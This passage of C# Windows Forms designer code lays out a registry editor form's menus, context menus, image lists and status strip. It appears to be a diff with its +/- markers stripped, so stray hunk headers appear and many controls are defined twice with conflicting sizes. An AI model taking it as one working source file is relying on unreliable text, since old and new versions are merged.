this.statusStrip.Size = new System.Drawing.Size(784, 22);
this.statusStrip.TabIndex = 1;
this.statusStrip.Text = "statusStrip";
//
// selectedStripStatusLabel
//
this.selectedStripStatusLabel.Name = "selectedStripStatusLabel";
this.selectedStripStatusLabel.Size = new System.Drawing.Size(0, 17);
//
// menuStrip
//
this.menuStrip.Dock = System.Windows.Forms.DockStyle.None;
this.menuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.fileToolStripMenuItem,
this.editToolStripMenuItem});
this.menuStrip.Location = new System.Drawing.Point(0, 0);
this.menuStrip.Name = "menuStrip";
this.menuStrip.Size = new System.Drawing.Size(84, 24);
this.menuStrip.TabIndex = 2;
//
// fileToolStripMenuItem
//
this.fileToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.exitToolStripMenuItem});
this.fileToolStripMenuItem.Name = "fileToolStripMenuItem";
this.fileToolStripMenuItem.Size = new System.Drawing.Size(37, 20);
this.fileToolStripMenuItem.Text = "File";
//
// exitToolStripMenuItem
//
this.exitToolStripMenuItem.Name = "exitToolStripMenuItem";
this.exitToolStripMenuItem.Size = new System.Drawing.Size(92, 22);
this.exitToolStripMenuItem.Text = "Exit";
this.exitToolStripMenuItem.Click += new System.EventHandler(this.menuStripExit_Click);
//
// editToolStripMenuItem
//
this.editToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.modifyToolStripMenuItem1,
this.modifyBinaryDataToolStripMenuItem1,
this.modifyNewtoolStripSeparator,
this.newToolStripMenuItem2,
this.toolStripSeparator6,
this.deleteToolStripMenuItem2,
this.renameToolStripMenuItem2});
this.editToolStripMenuItem.Name = "editToolStripMenuItem";
this.editToolStripMenuItem.Size = new System.Drawing.Size(39, 20);
this.editToolStripMenuItem.Text = "Edit";
this.editToolStripMenuItem.DropDownOpening += new System.EventHandler(this.editToolStripMenuItem_DropDownOpening);
//
// modifyToolStripMenuItem1
//
this.modifyToolStripMenuItem1.Enabled = false;
this.modifyToolStripMenuItem1.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.modifyToolStripMenuItem1.Name = "modifyToolStripMenuItem1";
this.modifyToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
this.modifyToolStripMenuItem1.Text = "Modify...";
this.modifyToolStripMenuItem1.Visible = false;
this.modifyToolStripMenuItem1.Click += new System.EventHandler(this.modifyRegistryValue_Click);
//
// modifyBinaryDataToolStripMenuItem1
//
this.modifyBinaryDataToolStripMenuItem1.Enabled = false;
this.modifyBinaryDataToolStripMenuItem1.Name = "modifyBinaryDataToolStripMenuItem1";
this.modifyBinaryDataToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
this.modifyBinaryDataToolStripMenuItem1.Text = "Modify Binary Data...";
this.modifyBinaryDataToolStripMenuItem1.Visible = false;
this.modifyBinaryDataToolStripMenuItem1.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click);
//
// modifyNewtoolStripSeparator
//
this.modifyNewtoolStripSeparator.Name = "modifyNewtoolStripSeparator";
this.modifyNewtoolStripSeparator.Size = new System.Drawing.Size(181, 6);
this.modifyNewtoolStripSeparator.Visible = false;
//
// newToolStripMenuItem2
//
this.newToolStripMenuItem2.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.keyToolStripMenuItem2,
this.toolStripSeparator7,
this.stringValueToolStripMenuItem2,
this.binaryValueToolStripMenuItem2,
this.dWORD32bitValueToolStripMenuItem2,
this.qWORD64bitValueToolStripMenuItem2,
this.multiStringValueToolStripMenuItem2,
this.expandableStringValueToolStripMenuItem2});
this.newToolStripMenuItem2.Name = "newToolStripMenuItem2";
this.newToolStripMenuItem2.Size = new System.Drawing.Size(184, 22);
this.newToolStripMenuItem2.Text = "New";
//
// keyToolStripMenuItem2
//
this.keyToolStripMenuItem2.Name = "keyToolStripMenuItem2";
this.keyToolStripMenuItem2.Size = new System.Drawing.Size(199, 22);
this.keyToolStripMenuItem2.Text = "Key";
this.keyToolStripMenuItem2.Click += new System.EventHandler(this.createNewRegistryKey_Click);
//
// toolStripSeparator7
//
this.toolStripSeparator7.Name = "toolStripSeparator7";
this.toolStripSeparator7.Size = new System.Drawing.Size(196, 6);
//
// stringValueToolStripMenuItem2
//
this.stringValueToolStripMenuItem2.Name = "stringValueToolStripMenuItem2";
this.stringValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22);
this.stringValueToolStripMenuItem2.Text = "String Value";
this.stringValueToolStripMenuItem2.Click += new System.EventHandler(this.createStringRegistryValue_Click);
//
// binaryValueToolStripMenuItem2
//
this.binaryValueToolStripMenuItem2.Name = "binaryValueToolStripMenuItem2";
this.binaryValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22);
this.binaryValueToolStripMenuItem2.Text = "Binary Value";
this.binaryValueToolStripMenuItem2.Click += new System.EventHandler(this.createBinaryRegistryValue_Click);
//
// dWORD32bitValueToolStripMenuItem2
//
this.dWORD32bitValueToolStripMenuItem2.Name = "dWORD32bitValueToolStripMenuItem2";
this.dWORD32bitValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22);
this.dWORD32bitValueToolStripMenuItem2.Text = "DWORD (32-bit) Value";
this.dWORD32bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createDwordRegistryValue_Click);
//
// qWORD64bitValueToolStripMenuItem2
//
this.qWORD64bitValueToolStripMenuItem2.Name = "qWORD64bitValueToolStripMenuItem2";
this.qWORD64bitValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22);
this.qWORD64bitValueToolStripMenuItem2.Text = "QWORD (64-bit) Value";
this.qWORD64bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createQwordRegistryValue_Click);
//
// multiStringValueToolStripMenuItem2
//
this.multiStringValueToolStripMenuItem2.Name = "multiStringValueToolStripMenuItem2";
this.multiStringValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22);
this.multiStringValueToolStripMenuItem2.Text = "Multi-String Value";
this.multiStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click);
//
// expandableStringValueToolStripMenuItem2
//
this.expandableStringValueToolStripMenuItem2.Name = "expandableStringValueToolStripMenuItem2";
this.expandableStringValueToolStripMenuItem2.Size = new System.Drawing.Size(199, 22);
this.expandableStringValueToolStripMenuItem2.Text = "Expandable String Value";
this.expandableStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click);
//
// toolStripSeparator6
//
this.toolStripSeparator6.Name = "toolStripSeparator6";
this.toolStripSeparator6.Size = new System.Drawing.Size(181, 6);
//
// deleteToolStripMenuItem2
//
this.deleteToolStripMenuItem2.Enabled = false;
this.deleteToolStripMenuItem2.Name = "deleteToolStripMenuItem2";
this.deleteToolStripMenuItem2.ShortcutKeyDisplayString = "Del";
this.deleteToolStripMenuItem2.Size = new System.Drawing.Size(184, 22);
this.deleteToolStripMenuItem2.Text = "Delete";
this.deleteToolStripMenuItem2.Click += new System.EventHandler(this.menuStripDelete_Click);
//
// renameToolStripMenuItem2
//
this.renameToolStripMenuItem2.Enabled = false;
this.renameToolStripMenuItem2.Name = "renameToolStripMenuItem2";
this.renameToolStripMenuItem2.Size = new System.Drawing.Size(184, 22);
this.renameToolStripMenuItem2.Text = "Rename";
this.renameToolStripMenuItem2.Click += new System.EventHandler(this.menuStripRename_Click);
//
// tv_ContextMenuStrip
//
this.tv_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.newToolStripMenuItem,
this.toolStripSeparator1,
this.deleteToolStripMenuItem,
this.renameToolStripMenuItem});
this.tv_ContextMenuStrip.Name = "contextMenuStrip";
this.tv_ContextMenuStrip.Size = new System.Drawing.Size(118, 76);
//
// newToolStripMenuItem
//
this.newToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.keyToolStripMenuItem,
this.toolStripSeparator2,
this.stringValueToolStripMenuItem,
this.binaryValueToolStripMenuItem,
this.dWORD32bitValueToolStripMenuItem,
this.qWORD64bitValueToolStripMenuItem,
this.multiStringValueToolStripMenuItem,
this.expandableStringValueToolStripMenuItem});
this.newToolStripMenuItem.Name = "newToolStripMenuItem";
this.newToolStripMenuItem.Size = new System.Drawing.Size(117, 22);
this.newToolStripMenuItem.Text = "New";
//
// keyToolStripMenuItem
//
this.keyToolStripMenuItem.Name = "keyToolStripMenuItem";
this.keyToolStripMenuItem.Size = new System.Drawing.Size(199, 22);
this.keyToolStripMenuItem.Text = "Key";
this.keyToolStripMenuItem.Click += new System.EventHandler(this.createNewRegistryKey_Click);
//
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
this.toolStripSeparator2.Size = new System.Drawing.Size(196, 6);
//
// stringValueToolStripMenuItem
//
this.stringValueToolStripMenuItem.Name = "stringValueToolStripMenuItem";
this.stringValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22);
this.stringValueToolStripMenuItem.Text = "String Value";
this.stringValueToolStripMenuItem.Click += new System.EventHandler(this.createStringRegistryValue_Click);
//
// binaryValueToolStripMenuItem
//
this.binaryValueToolStripMenuItem.Name = "binaryValueToolStripMenuItem";
this.binaryValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22);
this.binaryValueToolStripMenuItem.Text = "Binary Value";
this.binaryValueToolStripMenuItem.Click += new System.EventHandler(this.createBinaryRegistryValue_Click);
//
// dWORD32bitValueToolStripMenuItem
//
this.dWORD32bitValueToolStripMenuItem.Name = "dWORD32bitValueToolStripMenuItem";
this.dWORD32bitValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22);
this.dWORD32bitValueToolStripMenuItem.Text = "DWORD (32-bit) Value";
this.dWORD32bitValueToolStripMenuItem.Click += new System.EventHandler(this.createDwordRegistryValue_Click);
//
// qWORD64bitValueToolStripMenuItem
//
this.qWORD64bitValueToolStripMenuItem.Name = "qWORD64bitValueToolStripMenuItem";
this.qWORD64bitValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22);
this.qWORD64bitValueToolStripMenuItem.Text = "QWORD (64-bit) Value";
this.qWORD64bitValueToolStripMenuItem.Click += new System.EventHandler(this.createQwordRegistryValue_Click);
//
// multiStringValueToolStripMenuItem
//
this.multiStringValueToolStripMenuItem.Name = "multiStringValueToolStripMenuItem";
this.multiStringValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22);
this.multiStringValueToolStripMenuItem.Text = "Multi-String Value";
this.multiStringValueToolStripMenuItem.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click);
//
// expandableStringValueToolStripMenuItem
//
this.expandableStringValueToolStripMenuItem.Name = "expandableStringValueToolStripMenuItem";
this.expandableStringValueToolStripMenuItem.Size = new System.Drawing.Size(199, 22);
this.expandableStringValueToolStripMenuItem.Text = "Expandable String Value";
this.expandableStringValueToolStripMenuItem.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click);
//
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new System.Drawing.Size(114, 6);
//
// deleteToolStripMenuItem
//
this.deleteToolStripMenuItem.Enabled = false;
this.deleteToolStripMenuItem.Name = "deleteToolStripMenuItem";
this.deleteToolStripMenuItem.Size = new System.Drawing.Size(117, 22);
this.deleteToolStripMenuItem.Text = "Delete";
this.deleteToolStripMenuItem.Click += new System.EventHandler(this.deleteRegistryKey_Click);
//
// renameToolStripMenuItem
//
this.renameToolStripMenuItem.Enabled = false;
this.renameToolStripMenuItem.Name = "renameToolStripMenuItem";
this.renameToolStripMenuItem.Size = new System.Drawing.Size(117, 22);
this.renameToolStripMenuItem.Text = "Rename";
this.renameToolStripMenuItem.Click += new System.EventHandler(this.renameRegistryKey_Click);
//
// selectedItem_ContextMenuStrip
//
this.selectedItem_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.modifyToolStripMenuItem,
this.modifyBinaryDataToolStripMenuItem,
this.modifyToolStripSeparator1,
this.deleteToolStripMenuItem1,
this.renameToolStripMenuItem1});
this.selectedItem_ContextMenuStrip.Name = "selectedItem_ContextMenuStrip";
this.selectedItem_ContextMenuStrip.Size = new System.Drawing.Size(185, 98);
//
// modifyToolStripMenuItem
//
this.modifyToolStripMenuItem.Enabled = false;
this.modifyToolStripMenuItem.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.modifyToolStripMenuItem.Name = "modifyToolStripMenuItem";
this.modifyToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
this.modifyToolStripMenuItem.Text = "Modify...";
this.modifyToolStripMenuItem.Click += new System.EventHandler(this.modifyRegistryValue_Click);
//
// modifyBinaryDataToolStripMenuItem
//
this.modifyBinaryDataToolStripMenuItem.Enabled = false;
this.modifyBinaryDataToolStripMenuItem.Name = "modifyBinaryDataToolStripMenuItem";
this.modifyBinaryDataToolStripMenuItem.Size = new System.Drawing.Size(184, 22);
this.modifyBinaryDataToolStripMenuItem.Text = "Modify Binary Data...";
this.modifyBinaryDataToolStripMenuItem.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click);
//
// modifyToolStripSeparator1
//
this.modifyToolStripSeparator1.Name = "modifyToolStripSeparator1";
this.modifyToolStripSeparator1.Size = new System.Drawing.Size(181, 6);
//
// deleteToolStripMenuItem1
//
this.deleteToolStripMenuItem1.Name = "deleteToolStripMenuItem1";
this.deleteToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
this.deleteToolStripMenuItem1.Text = "Delete";
this.deleteToolStripMenuItem1.Click += new System.EventHandler(this.deleteRegistryValue_Click);
//
// renameToolStripMenuItem1
//
this.renameToolStripMenuItem1.Name = "renameToolStripMenuItem1";
this.renameToolStripMenuItem1.Size = new System.Drawing.Size(184, 22);
this.renameToolStripMenuItem1.Text = "Rename";
this.renameToolStripMenuItem1.Click += new System.EventHandler(this.renameRegistryValue_Click);
//
// lst_ContextMenuStrip
//
this.lst_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.newToolStripMenuItem1});
this.lst_ContextMenuStrip.Name = "lst_ContextMenuStrip";
this.lst_ContextMenuStrip.Size = new System.Drawing.Size(99, 26);
//
// newToolStripMenuItem1
//
this.newToolStripMenuItem1.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.keyToolStripMenuItem1,
this.toolStripSeparator4,
this.stringValueToolStripMenuItem1,
this.binaryValueToolStripMenuItem1,
this.dWORD32bitValueToolStripMenuItem1,
this.qWORD64bitValueToolStripMenuItem1,
this.multiStringValueToolStripMenuItem1,
this.expandableStringValueToolStripMenuItem1});
this.newToolStripMenuItem1.Name = "newToolStripMenuItem1";
this.newToolStripMenuItem1.Size = new System.Drawing.Size(98, 22);
this.newToolStripMenuItem1.Text = "New";
//
// keyToolStripMenuItem1
//
this.keyToolStripMenuItem1.Name = "keyToolStripMenuItem1";
this.keyToolStripMenuItem1.Size = new System.Drawing.Size(199, 22);
this.keyToolStripMenuItem1.Text = "Key";
this.keyToolStripMenuItem1.Click += new System.EventHandler(this.createNewRegistryKey_Click);
//
// toolStripSeparator4
//
this.toolStripSeparator4.Name = "toolStripSeparator4";
this.toolStripSeparator4.Size = new System.Drawing.Size(196, 6);
//
// stringValueToolStripMenuItem1
//
this.stringValueToolStripMenuItem1.Name = "stringValueToolStripMenuItem1";
this.stringValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22);
this.stringValueToolStripMenuItem1.Text = "String Value";
this.stringValueToolStripMenuItem1.Click += new System.EventHandler(this.createStringRegistryValue_Click);
//
// binaryValueToolStripMenuItem1
//
this.binaryValueToolStripMenuItem1.Name = "binaryValueToolStripMenuItem1";
this.binaryValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22);
this.binaryValueToolStripMenuItem1.Text = "Binary Value";
this.binaryValueToolStripMenuItem1.Click += new System.EventHandler(this.createBinaryRegistryValue_Click);
//
// dWORD32bitValueToolStripMenuItem1
//
this.dWORD32bitValueToolStripMenuItem1.Name = "dWORD32bitValueToolStripMenuItem1";
this.dWORD32bitValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22);
this.dWORD32bitValueToolStripMenuItem1.Text = "DWORD (32-bit) Value";
this.dWORD32bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createDwordRegistryValue_Click);
//
// qWORD64bitValueToolStripMenuItem1
//
this.qWORD64bitValueToolStripMenuItem1.Name = "qWORD64bitValueToolStripMenuItem1";
this.qWORD64bitValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22);
this.qWORD64bitValueToolStripMenuItem1.Text = "QWORD (64-bit) Value";
this.qWORD64bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createQwordRegistryValue_Click);
//
// multiStringValueToolStripMenuItem1
//
this.multiStringValueToolStripMenuItem1.Name = "multiStringValueToolStripMenuItem1";
this.multiStringValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22);
this.multiStringValueToolStripMenuItem1.Text = "Multi-String Value";
this.multiStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click);
//
// expandableStringValueToolStripMenuItem1
//
this.expandableStringValueToolStripMenuItem1.Name = "expandableStringValueToolStripMenuItem1";
this.expandableStringValueToolStripMenuItem1.Size = new System.Drawing.Size(199, 22);
this.expandableStringValueToolStripMenuItem1.Text = "Expandable String Value";
this.expandableStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click);
//
// tvRegistryDirectory
//
this.tvRegistryDirectory.Dock = System.Windows.Forms.DockStyle.Fill;
@ -564,6 +156,12 @@ namespace Server.Forms
this.tvRegistryDirectory.NodeMouseClick += new System.Windows.Forms.TreeNodeMouseClickEventHandler(this.tvRegistryDirectory_NodeMouseClick);
this.tvRegistryDirectory.KeyUp += new System.Windows.Forms.KeyEventHandler(this.tvRegistryDirectory_KeyUp);
//
// imageRegistryDirectoryList
//
this.imageRegistryDirectoryList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryDirectoryList.ImageStream")));
this.imageRegistryDirectoryList.TransparentColor = System.Drawing.Color.Transparent;
this.imageRegistryDirectoryList.Images.SetKeyName(0, "folder.png");
//
// lstRegistryValues
//
this.lstRegistryValues.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] {
@ -600,7 +198,414 @@ namespace Server.Forms
this.hValue.Text = "Value";
this.hValue.Width = 214;
//
// FrmRegistryEditor
// imageRegistryKeyTypeList
//
this.imageRegistryKeyTypeList.ImageStream = ((System.Windows.Forms.ImageListStreamer)(resources.GetObject("imageRegistryKeyTypeList.ImageStream")));
this.imageRegistryKeyTypeList.TransparentColor = System.Drawing.Color.Transparent;
this.imageRegistryKeyTypeList.Images.SetKeyName(0, "reg_string.png");
this.imageRegistryKeyTypeList.Images.SetKeyName(1, "reg_binary.png");
//
// statusStrip
//
this.statusStrip.Dock = System.Windows.Forms.DockStyle.Fill;
this.statusStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.selectedStripStatusLabel});
this.statusStrip.Location = new System.Drawing.Point(0, 539);
this.statusStrip.Name = "statusStrip";
this.statusStrip.Size = new System.Drawing.Size(784, 22);
this.statusStrip.TabIndex = 1;
this.statusStrip.Text = "statusStrip";
//
// selectedStripStatusLabel
//
this.selectedStripStatusLabel.Name = "selectedStripStatusLabel";
this.selectedStripStatusLabel.Size = new System.Drawing.Size(0, 17);
//
// menuStrip
//
this.menuStrip.Dock = System.Windows.Forms.DockStyle.None;
this.menuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.fileToolStripMenuItem,
this.editToolStripMenuItem});
this.menuStrip.Location = new System.Drawing.Point(0, 0);
this.menuStrip.Name = "menuStrip";
this.menuStrip.Size = new System.Drawing.Size(89, 25);
this.menuStrip.TabIndex = 2;
//
// fileToolStripMenuItem
//
this.fileToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.exitToolStripMenuItem});
this.fileToolStripMenuItem.Name = "fileToolStripMenuItem";
this.fileToolStripMenuItem.Size = new System.Drawing.Size(39, 21);
this.fileToolStripMenuItem.Text = "File";
//
// exitToolStripMenuItem
//
this.exitToolStripMenuItem.Name = "exitToolStripMenuItem";
this.exitToolStripMenuItem.Size = new System.Drawing.Size(96, 22);
this.exitToolStripMenuItem.Text = "Exit";
this.exitToolStripMenuItem.Click += new System.EventHandler(this.menuStripExit_Click);
//
// editToolStripMenuItem
//
this.editToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.modifyToolStripMenuItem1,
this.modifyBinaryDataToolStripMenuItem1,
this.modifyNewtoolStripSeparator,
this.newToolStripMenuItem2,
this.toolStripSeparator6,
this.deleteToolStripMenuItem2,
this.renameToolStripMenuItem2});
this.editToolStripMenuItem.Name = "editToolStripMenuItem";
this.editToolStripMenuItem.Size = new System.Drawing.Size(42, 21);
this.editToolStripMenuItem.Text = "Edit";
this.editToolStripMenuItem.DropDownOpening += new System.EventHandler(this.editToolStripMenuItem_DropDownOpening);
//
// modifyToolStripMenuItem1
//
this.modifyToolStripMenuItem1.Enabled = false;
this.modifyToolStripMenuItem1.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.modifyToolStripMenuItem1.Name = "modifyToolStripMenuItem1";
this.modifyToolStripMenuItem1.Size = new System.Drawing.Size(197, 22);
this.modifyToolStripMenuItem1.Text = "Modify...";
this.modifyToolStripMenuItem1.Visible = false;
this.modifyToolStripMenuItem1.Click += new System.EventHandler(this.modifyRegistryValue_Click);
//
// modifyBinaryDataToolStripMenuItem1
//
this.modifyBinaryDataToolStripMenuItem1.Enabled = false;
this.modifyBinaryDataToolStripMenuItem1.Name = "modifyBinaryDataToolStripMenuItem1";
this.modifyBinaryDataToolStripMenuItem1.Size = new System.Drawing.Size(197, 22);
this.modifyBinaryDataToolStripMenuItem1.Text = "Modify Binary Data...";
this.modifyBinaryDataToolStripMenuItem1.Visible = false;
this.modifyBinaryDataToolStripMenuItem1.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click);
//
// modifyNewtoolStripSeparator
//
this.modifyNewtoolStripSeparator.Name = "modifyNewtoolStripSeparator";
this.modifyNewtoolStripSeparator.Size = new System.Drawing.Size(194, 6);
this.modifyNewtoolStripSeparator.Visible = false;
//
// newToolStripMenuItem2
//
this.newToolStripMenuItem2.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.keyToolStripMenuItem2,
this.toolStripSeparator7,
this.stringValueToolStripMenuItem2,
this.binaryValueToolStripMenuItem2,
this.dWORD32bitValueToolStripMenuItem2,
this.qWORD64bitValueToolStripMenuItem2,
this.multiStringValueToolStripMenuItem2,
this.expandableStringValueToolStripMenuItem2});
this.newToolStripMenuItem2.Name = "newToolStripMenuItem2";
this.newToolStripMenuItem2.Size = new System.Drawing.Size(197, 22);
this.newToolStripMenuItem2.Text = "New";
//
// keyToolStripMenuItem2
//
this.keyToolStripMenuItem2.Name = "keyToolStripMenuItem2";
this.keyToolStripMenuItem2.Size = new System.Drawing.Size(218, 22);
this.keyToolStripMenuItem2.Text = "Key";
this.keyToolStripMenuItem2.Click += new System.EventHandler(this.createNewRegistryKey_Click);
//
// toolStripSeparator7
//
this.toolStripSeparator7.Name = "toolStripSeparator7";
this.toolStripSeparator7.Size = new System.Drawing.Size(215, 6);
//
// stringValueToolStripMenuItem2
//
this.stringValueToolStripMenuItem2.Name = "stringValueToolStripMenuItem2";
this.stringValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22);
this.stringValueToolStripMenuItem2.Text = "String Value";
this.stringValueToolStripMenuItem2.Click += new System.EventHandler(this.createStringRegistryValue_Click);
//
// binaryValueToolStripMenuItem2
//
this.binaryValueToolStripMenuItem2.Name = "binaryValueToolStripMenuItem2";
this.binaryValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22);
this.binaryValueToolStripMenuItem2.Text = "Binary Value";
this.binaryValueToolStripMenuItem2.Click += new System.EventHandler(this.createBinaryRegistryValue_Click);
//
// dWORD32bitValueToolStripMenuItem2
//
this.dWORD32bitValueToolStripMenuItem2.Name = "dWORD32bitValueToolStripMenuItem2";
this.dWORD32bitValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22);
this.dWORD32bitValueToolStripMenuItem2.Text = "DWORD (32-bit) Value";
this.dWORD32bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createDwordRegistryValue_Click);
//
// qWORD64bitValueToolStripMenuItem2
//
this.qWORD64bitValueToolStripMenuItem2.Name = "qWORD64bitValueToolStripMenuItem2";
this.qWORD64bitValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22);
this.qWORD64bitValueToolStripMenuItem2.Text = "QWORD (64-bit) Value";
this.qWORD64bitValueToolStripMenuItem2.Click += new System.EventHandler(this.createQwordRegistryValue_Click);
//
// multiStringValueToolStripMenuItem2
//
this.multiStringValueToolStripMenuItem2.Name = "multiStringValueToolStripMenuItem2";
this.multiStringValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22);
this.multiStringValueToolStripMenuItem2.Text = "Multi-String Value";
this.multiStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click);
//
// expandableStringValueToolStripMenuItem2
//
this.expandableStringValueToolStripMenuItem2.Name = "expandableStringValueToolStripMenuItem2";
this.expandableStringValueToolStripMenuItem2.Size = new System.Drawing.Size(218, 22);
this.expandableStringValueToolStripMenuItem2.Text = "Expandable String Value";
this.expandableStringValueToolStripMenuItem2.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click);
//
// toolStripSeparator6
//
this.toolStripSeparator6.Name = "toolStripSeparator6";
this.toolStripSeparator6.Size = new System.Drawing.Size(194, 6);
//
// deleteToolStripMenuItem2
//
this.deleteToolStripMenuItem2.Enabled = false;
this.deleteToolStripMenuItem2.Name = "deleteToolStripMenuItem2";
this.deleteToolStripMenuItem2.ShortcutKeyDisplayString = "Del";
this.deleteToolStripMenuItem2.Size = new System.Drawing.Size(197, 22);
this.deleteToolStripMenuItem2.Text = "Delete";
this.deleteToolStripMenuItem2.Click += new System.EventHandler(this.menuStripDelete_Click);
//
// renameToolStripMenuItem2
//
this.renameToolStripMenuItem2.Enabled = false;
this.renameToolStripMenuItem2.Name = "renameToolStripMenuItem2";
this.renameToolStripMenuItem2.Size = new System.Drawing.Size(197, 22);
this.renameToolStripMenuItem2.Text = "Rename";
this.renameToolStripMenuItem2.Click += new System.EventHandler(this.menuStripRename_Click);
//
// tv_ContextMenuStrip
//
this.tv_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.newToolStripMenuItem,
this.toolStripSeparator1,
this.deleteToolStripMenuItem,
this.renameToolStripMenuItem});
this.tv_ContextMenuStrip.Name = "contextMenuStrip";
this.tv_ContextMenuStrip.Size = new System.Drawing.Size(124, 76);
//
// newToolStripMenuItem
//
this.newToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.keyToolStripMenuItem,
this.toolStripSeparator2,
this.stringValueToolStripMenuItem,
this.binaryValueToolStripMenuItem,
this.dWORD32bitValueToolStripMenuItem,
this.qWORD64bitValueToolStripMenuItem,
this.multiStringValueToolStripMenuItem,
this.expandableStringValueToolStripMenuItem});
this.newToolStripMenuItem.Name = "newToolStripMenuItem";
this.newToolStripMenuItem.Size = new System.Drawing.Size(123, 22);
this.newToolStripMenuItem.Text = "New";
//
// keyToolStripMenuItem
//
this.keyToolStripMenuItem.Name = "keyToolStripMenuItem";
this.keyToolStripMenuItem.Size = new System.Drawing.Size(218, 22);
this.keyToolStripMenuItem.Text = "Key";
this.keyToolStripMenuItem.Click += new System.EventHandler(this.createNewRegistryKey_Click);
//
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
this.toolStripSeparator2.Size = new System.Drawing.Size(215, 6);
//
// stringValueToolStripMenuItem
//
this.stringValueToolStripMenuItem.Name = "stringValueToolStripMenuItem";
this.stringValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22);
this.stringValueToolStripMenuItem.Text = "String Value";
this.stringValueToolStripMenuItem.Click += new System.EventHandler(this.createStringRegistryValue_Click);
//
// binaryValueToolStripMenuItem
//
this.binaryValueToolStripMenuItem.Name = "binaryValueToolStripMenuItem";
this.binaryValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22);
this.binaryValueToolStripMenuItem.Text = "Binary Value";
this.binaryValueToolStripMenuItem.Click += new System.EventHandler(this.createBinaryRegistryValue_Click);
//
// dWORD32bitValueToolStripMenuItem
//
this.dWORD32bitValueToolStripMenuItem.Name = "dWORD32bitValueToolStripMenuItem";
this.dWORD32bitValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22);
this.dWORD32bitValueToolStripMenuItem.Text = "DWORD (32-bit) Value";
this.dWORD32bitValueToolStripMenuItem.Click += new System.EventHandler(this.createDwordRegistryValue_Click);
//
// qWORD64bitValueToolStripMenuItem
//
this.qWORD64bitValueToolStripMenuItem.Name = "qWORD64bitValueToolStripMenuItem";
this.qWORD64bitValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22);
this.qWORD64bitValueToolStripMenuItem.Text = "QWORD (64-bit) Value";
this.qWORD64bitValueToolStripMenuItem.Click += new System.EventHandler(this.createQwordRegistryValue_Click);
//
// multiStringValueToolStripMenuItem
//
this.multiStringValueToolStripMenuItem.Name = "multiStringValueToolStripMenuItem";
